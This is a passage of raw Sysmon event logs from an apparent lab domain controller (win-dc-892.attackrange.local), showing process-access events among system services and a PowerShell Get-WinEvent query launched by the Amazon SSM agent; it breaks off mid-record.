12:01:08.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.318{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.315{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.315{266CAFBE-647E-6064-4300-00000000AE01}39243756C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.315{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-WinEvent -FilterHashtable @( @{ LogName='System'; ProviderName='Microsoft-Windows-Kernel-General'; Id=12; Level=4 }, @{ LogName='System'; ProviderName='Microsoft-Windows-WER-SystemErrorReporting'; Id=1001; Level=2 } ) | Sort-Object TimeCreated -Descending" "| Select-Object" "Id, Level, ProviderName, TimeCreated, Properties" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000002907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.285{266CAFBE-6482-6064-6A00-00000000AE01}2504NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6485-6064-7300-00000000AE01}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6485-6064-7300-00000000AE01}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6485-6064-7300-00000000AE01}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.144{266CAFBE-6485-6064-7300-00000000AE01}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 